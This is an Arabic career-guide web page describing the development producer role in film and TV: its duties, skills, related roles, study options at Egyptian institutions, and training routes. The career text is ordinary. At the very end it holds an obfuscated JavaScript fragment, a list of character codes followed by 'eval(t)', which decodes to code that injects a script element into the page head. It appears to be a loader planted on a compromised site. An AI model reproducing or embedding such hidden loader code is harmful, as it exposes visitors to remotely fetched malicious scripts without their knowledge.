يُعرف أيضًا باسم: منتج تطوير الدراما ، مطور البرنامج النصي ، مدير التطوير
ماذا يفعل منتج المطور؟
يجد منتجو التطوير قصصًا ونصوصًا ويحصلون عليها بشكل جيد بما يكفي ليتم تكليفها من قبل قناة تلفزيونية أو تحويلها إلى فيلم روائي طويل.
يقرأون سيناريوهات ويحللون نقاط القوة والضعف لديهم ويقيمون ما إذا كان لديهم إمكانات وسيجذبون الجماهير. يقومون بتدوين الملاحظات حول كيفية تحسينها (ملاحظات البرنامج النصي) ويطلبون من كاتب السيناريو إعادة الكتابة وفقًا لذلك. غالبًا ما يستغرق استكمال أعمال تطوير سيناريوهات الأفلام بضع سنوات. في بعض الحالات ، قد يستغرق الأمر عشر سنوات قبل بدء الإنتاج.
بالنسبة للدراما التلفزيونية ، قد ينطوي دور منتج التطوير أيضًا على عرض مفاهيم على مفوضي التلفزيون. عادةً ما يكون العرض التقديمي عرضًا شفهيًا ، على الرغم من أنه غالبًا ما يتم دعمه بالعلاج (مستند موجز يلخص فكرة البرنامج) ، بالإضافة إلى شريط ذواق أو بكرة صغيرة (فيديو قصير يوضح ، بأكثر طريقة مثيرة ممكنة ، كيف قد يظهر البرنامج).
يتم توظيف منتجي التنمية من قبل المذيعين وشركات الإنتاج ووكالات الشاشة. تختلف مسؤولياتهم اعتمادًا على نوع المنظمة التي يعملون فيها ، ولكن أينما يعملون ، فإنهم يبحثون عن مشاريع جديدة وكتابة المواهب
ما الذي يجيده منتج التطوير؟
• المعرفة بكتابة السيناريو: فهم جميع ميزات سيناريو كبير ، ومعرفة كيفية تحسين وتعديل واحد
• المعرفة بالصناعة: لديهم معرفة واسعة وشغف بالدراما السينمائية أو التلفزيونية ، ونقدر الاتجاهات في المشاهدة ، وتنبؤ بما سيكون شائع
• التواصل: عرض تقديمي فعال ، وإقناع المفوضين أو المنتجين بمزايا السيناريو ، وشرح الملاحظات للكتاب والعمل معهم عن كثب
• اكتشاف الإمكانات: شاهد الإمكانيات في المسودات المبكرة ، تخيل الجمهور ، تقدير تكلفة الإنتاج بناءً على البرنامج النصي
• المعرفة بالفنون: لديهم معرفة عميقة وواسعة بجميع أنواع الفن ، وتكون قادرة على الحصول على أفكار من مجموعة من الأنواع وفهم السياق الثقافي للإنتاج
مع من قد يعمل المنتج المطور؟
المنتج التنفيذي (TV)
في شركات الإنتاج ، قد يعمل منتجو التطوير مع منتج تنفيذي. يكتسب المنتجون التنفيذيون ويطورون القصص والسيناريوهات ويكونون أحيانًا مسؤولين عن جمع التمويل. إنهم يحددون مشروعًا ذا إمكانات ثم ينقلونه إلى منتجي التنمية وكتاب السيناريو.
مساعد تنمية
يساعد مساعدو التنمية منتج التطوير من خلال قراءة النصوص والروايات والمدونات. يقومون بتغطية النص (كتابة تقارير النص) وتدوين الملاحظات خلال جلسات السرد. هذا دور مبتدئ.
كاتب السيناريو أو كاتب السيناريو
يكتب كتاب السيناريو النصوص. قد يعملون أيضًا على تحسين نصوص الكتاب الآخرين. انظر ملف تعريف منفصل: كتابة الشاشة
منتج القصة (TV)
يعمل منتجو القصة على الأعمال الدرامية التي تدور في عدة حلقات ويكتبها أكثر من كاتب سيناريو واحد. هم مسؤولون عن توفير إطار القصة ككل. فهي تساعد الكتاب على تطوير قصة ، وإنشاء أقواس سردية ، ثم توصيل الهيكل لقسم النص. في المسلسل الدرامي أو الصابون الطويل المدى ، قد يديرون فريق التحرير إلى جانب منتجي المسلسلات.
ستوريلينر (تلفزيون)
تحت إشراف منتج قصة محرر النص ، يطور رواة القصص خيوط القصة للمسلسلات التلفزيونية طويلة الأمد. قد يكونون مسؤولين عن عدد من السطور المختلفة أو عن عدد من الحلقات. يأخذون الأفكار من منتج القصة أو محرر النص لإنشاء وثيقة تحدد ما يحدث في تلك القصة أو الحلقة. يستخدم هذا لتكليف الكتاب ويصبح موجزهم للكتابة منه.
محرر البرنامج النصي (TV)
يراجع محررو النصوص البرمجية النصوص البرمجية للتأكد من أنها تلبي المعايير العالية المطلوبة للإنتاج ، لذلك هناك استمرارية بين المشاهد ، وكذلك الحلقات. يقدمون النصيحة حول النص لجميع الأطراف المعنية في الإنتاج. في الدراما التلفزيونية ، يمثلون نقطة الاتصال بين النص وفرق الإنتاج. يجوز لهم أيضًا
تقديم أفكار أو مفاهيم أصلية للحلقات في هذا الإعداد. يعمل محررو النص البرمجي إما بشكل مستقل أو في المنزل.
قارئ البرنامج النصي
يعمل قراء البرامج النصية بشكل أساسي مع المنظمات الممولة من القطاع العام مثل وكالات الشاشة الإقليمية. يقرأون سيناريوهات ويكتبون تقارير (تقارير تغطية) حول إمكاناتهم في التنمية. يبلغ طول تقرير القارئ النموذجي من 4 إلى 8 صفحات ، بما في ذلك تفاصيل القصة وتقييم ملاءمتها. يحتوي هذا عادةً على تحليل منطقي ، وفرضية ، وملخص ، ونغمة وتحليل النوع ، وصفحتين على الأقل من التعليقات حول نقاط القوة والضعف ، والملخص والحكم.
الباحث
يدعم الباحثون العاملين في مجال القصة والنصوص ، مما يضمن أن تعكس القصص والنصوص البحث الدقيق والمواد المصدر والإعداد ، سواء من الخيال أو التاريخي أو غير ذلك ، من البداية
كيف أصبح منتج تطوير؟
عادةً ما ينطوي التحول إلى منتج أو مدير تنفيذي على التقدم من خلال أي أو بعض أدوار النص البرمجي – القراءة أو الكتابة أو تحرير الأدوار. لدى العديد منهم أيضًا خبرة سابقة في العمل في مجالات أخرى من الإنتاج السينمائي والتلفزيوني. يمكنك التقدم بطلب إلى مكتشف المتدربين ScreenSkills
في المدرسة أو الكلية:
إذا كنت ترغب في الذهاب إلى الجامعة ، فإن المستويات A أو Highers في الدراما والمسرح ، تعد اللغة الإنجليزية ، ودراسات الأفلام والدراسات الإعلامية مفيدة. أو قد ترغب في الحصول على مؤهل مهني من المستوى 3 مثل:
● كلية الفنون التطبيقية جامعة حلوان
● المعهد العالي للسينما بأكاديمية الفنون بالهرم
● المعهد العالي للفنون التطبيقية بمدينة السادس من أكتوبر
● كلية الفنون والتصميم جامعة فاروس (الاسكندرية)
● كلية الفنون السينمائية والمسرحية جامعة بدر
● كلية الفنون الجامعة الأمريكية بالقاهرة
● الجامعة البريطانية بالقاهرة برنامج الصحافة ووسائل الإعلام الجديدة – برنامج الإذاعة والتليفزيون – برنامج دراسات الأفلام والإعلام – برنامج الإتصالات التسويقية المتكاملة
● المعهد العالي للفنون التطبيقية بأكاديمية القاهرة الجديدة
● كلية العلوم التطبيقية والفنون الجامعة الألمانية بالقاهرة
● كلية الفنون والتصميم جامعة العلوم الحديثة والآداب
● دورة فنون السينما و التلفزيون الجامعة الاهلية الفرنسية مركز التعليم المستمر الجامعة الفرنسية
● كلية التصميم والفنون الإبداعية جامعة الأهرام الكندية
● كلية الفنون التطبيقية جامعة دمياط
بناء سابقة أعمال:
إنشاء عمل يمكنك عرضه على معلمي القبول أو أرباب العمل. هذا أمر ضروري. انتقل إلى إنشاء محفظة الكتابة الخاصة بك لمعرفة كيفية القيام بذلك.
احصل على درجة علمية:
درجات اللغة الإنجليزية أو علم النفس ذات صلة ، أو قد تكون مهتمًا بدورات كتابة السيناريو. ألق نظرة على قائمة الدورات الموصى بها من ScreenSkills وحدد واحدة في الفيلم والتلفزيون أو ابحث عن واحدة في كتابة السيناريو. نحن نقدر الدورات الدراسية مع جائزة ScreenSkills Select الخاصة بنا حيث يقدمون التدريب في البرامج ذات الصلة ، ويخصصون وقتًا لبناء محفظة ولديهم روابط قوية مع صناعات الأفلام والتلفزيون.
خذ دورة قصيرة:
صقل مهاراتك وطوّر رؤيتك لكتابة السيناريو من خلال أخذ دورة متخصصة مثل:
• صندوق التدريب المستقل – دورات في البرمجة النصية
• المدرسة الوطنية للسينما والتلفزيون – دورات كتابة السيناريو
• آرفون – دورات وكتابة السيناريو
انتقل إلى قائمة الدورات التدريبية التي أوصى بها ScreenSkills ومعرفة ما إذا كان هناك واحدة في كتابة السيناريو.
شبكة الاتصال:
إنشاء ملف تعريف LinkedIn. تحقق مما إذا كانت هناك صفحات Facebook أو مجموعات وسائل التواصل الاجتماعي الأخرى للأشخاص الذين يصنعون الأفلام أو التلفزيون في منطقتك. قد تكون هناك مجموعات للعدائين والمتدربين. انضم إليهم. إنشاء ملف تعريف ScreenSkills. هناك الكثير من وكالات التوظيف التي ستفرض عليك رسومًا لتكون على كتبهم. اشترك في المجانية في البداية. تقدم شاشة ويلز وشاشة أيرلندا الشمالية ومناطق أخرى قواعد بيانات مجانية للطاقم. ابحث عن مكتب أفلام بالقرب منك وتواصل. إذا قمت بالتسجيل في مواقع مدفوعة ، فتأكد من أنها متخصصة في المجالات التي تهمك.
اكتساب مهارات العمل:
تقدم المدرسة الوطنية للسينما والتلفزيون بعض الدورات المتعلقة بالأعمال والتي تساعدك على تعلم المهارات للانتقال من كاتب السيناريو إلى منتج التطوير.
قد تكون مهتم ايضا ب…
الكتابة للراديو ، كونك كاتب مسرحي ، كونك منتج تطوير في صناعة التلفزيون غير المكتوبة أو كونك كاتبًا في صناعة الألعاب
مزيد من المصادر
107,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(t);